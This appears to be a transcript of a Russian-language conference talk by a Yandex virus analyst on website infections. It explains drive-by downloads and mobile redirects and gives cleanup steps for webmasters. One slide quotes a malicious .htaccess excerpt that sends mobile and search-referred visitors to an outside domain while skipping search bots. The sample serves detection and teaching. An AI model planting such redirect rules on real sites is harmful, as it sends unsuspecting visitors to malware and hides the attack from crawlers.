Андрей Ковалев - Безопасность сайта: мифы и реальность
DESCRIPTION
В поисковой выдаче Яндекса иногда можно встретить предупреждения о том, что сайт может быть небезопасен для компьютера или мобильного устройства пользователя. О том, что это значит, где найти вредоносный код и как его удалить, вы услышите из первых уст — от вирусного аналитика Яндекса.TRANSCRIPT
![Page 2: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/2.jpg)
2
Что значит заражен?
![Page 3: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/3.jpg)
3
Все равно?
! 99 % пользователей поиска не переходят на зараженные сайты!
![Page 4: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/4.jpg)
4
Не только поиск, браузер, но и:
![Page 5: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/5.jpg)
5
Drive-by-download Особенности реализации:
! Скрытая загрузка вредоносных страниц ! Использование Traffic Distribution-систем ! Установка вредоносного ПО как результат проведения атаки
![Page 6: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/6.jpg)
6
Redirect and mobile redirect Особенности
реализации: ! Выполнение атаки
только для целевой аудитории
! Введение пользователя в заблуждение
! Установка вредоносного ПО осуществляется только самим пользователем
![Page 7: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/7.jpg)
Как поймать вредоносный код?
Несколько простых правил
![Page 8: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/8.jpg)
8
Прежде чем что-либо делать, необходимо:
! Поменять пароли к ftp- и ssh-сервисам сайта
! Поменять пароли к базе данных сайта (phpmyadmin)
! Поменять пароли к панели администратора сайта
! Установить обновления CMS и плагинов
! Установить обновления / обновления безопасности ключевых сервисов сайта и ОС
![Page 9: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/9.jpg)
9
Вебмастер – скорая помощь!
Используйте Вебмастер, чтобы:
! Вовремя узнавать о заражении сайта
! Посмотреть примеры кода, которые актуальны для вердикта
! Отправить сайт на перепроверку, и связаться с поддержкой
![Page 10: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/10.jpg)
10
Сомневаешься, проверь свой сайт!
![Page 11: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/11.jpg)
11
Узнай, что нужно искать!
![Page 12: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/12.jpg)
12
Как проверить самому?
! Зайти на свой сайт из поиска с удаленными cookies и очищенным кэшем
! Использовать веб-прокси(Fiddler, HandyCache) для отслеживания загрузки в браузер любого контента
! Сменить User-Agent (Firefox User Agent Changer) на мобильный и попробовать зайти снова
![Page 13: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/13.jpg)
13
Веб-прокси в действии:
![Page 14: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/14.jpg)
14
Что искать на веб-странице?
! Подключение удаленных веб-страниц через <iframe src <script src
! Заражение популярных js библиотек
! Размещение на сайте вредоносных swf и pdf
![Page 15: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/15.jpg)
15
Размещение вредоносного swf-файла:
![Page 16: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/16.jpg)
16
А что тут такого страшного?
![Page 17: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/17.jpg)
17
Обфусцированный вредоносный js
![Page 18: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/18.jpg)
18
Что искать на веб-сервере?
! Модификацию файлов .htaccess (найти и проверить во всех директориях веб-сервера)
! Модификацию серверных скриптов и файлов веб-приложения (поискать подозрительные скрипты с обфускацией)
! Модификацию бинарных файлов веб-сервера и его модулей (проверить дату модификации, новые модули в конфигах)
![Page 19: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/19.jpg)
19
Пример вредоносного php
![Page 20: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/20.jpg)
20
Пример вредоносного .htaccess RewriteEngine On … RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR] RewriteCond %{HTTP_USER_AGENT} android [NC,OR] RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR] RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR] … RewriteCond %{HTTP_USER_AGENT} !google [NC] RewriteCond %{HTTP_USER_AGENT} !yandex [NC] RewriteCond %{HTTP_USER_AGENT} !bot [NC] … [L,R=302] RewriteCond %{HTTP_REFERER} ^http://www\.yandex\.ru/ [OR] RewriteCond %{HTTP_REFERER} ^http://google\.com/ [OR] … RewriteRule ^(.*)$ http://qo0.ru/?1&source=%{HTTP_HOST} [L,R=302]
![Page 21: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/21.jpg)
21
Если есть backup веб-приложения:
! Сравнить дистрибутив сайта и его backup по набору файлов
! Проверить разницу файлов с помощью DIFF
! Удалить найденный подозрительный код и / или новые подозрительные файлы
! Восстановить сайт из backup’а
![Page 22: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/22.jpg)
22
Проверка изменений с помощью DIFF:
![Page 23: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/23.jpg)
23
http://fiddler2.com/get-fiddler/
Веб-прокси (Fiddler2)
http://www.diffchecker.som/
Diff checker
![Page 24: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/24.jpg)
24
http://safesearch.ya.ru/
http://help.yandex.ru/webmaster/
Блог проекта
Раздел «Безопасность» в Яндекс.Вебмастер
![Page 25: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/25.jpg)
25
http://safe.yandex.ru/
Мы всегда рады образцам серверного вредоносного кода
Yandex SafeBrowsing API
![Page 26: Андрей Ковалев - Безопасность сайта: мифы и реальность](https://reader037.vdocuments.site/reader037/viewer/2022100305/557fd35bd8b42ad1048b4fd4/html5/thumbnails/26.jpg)
Спасибо! Вопросы?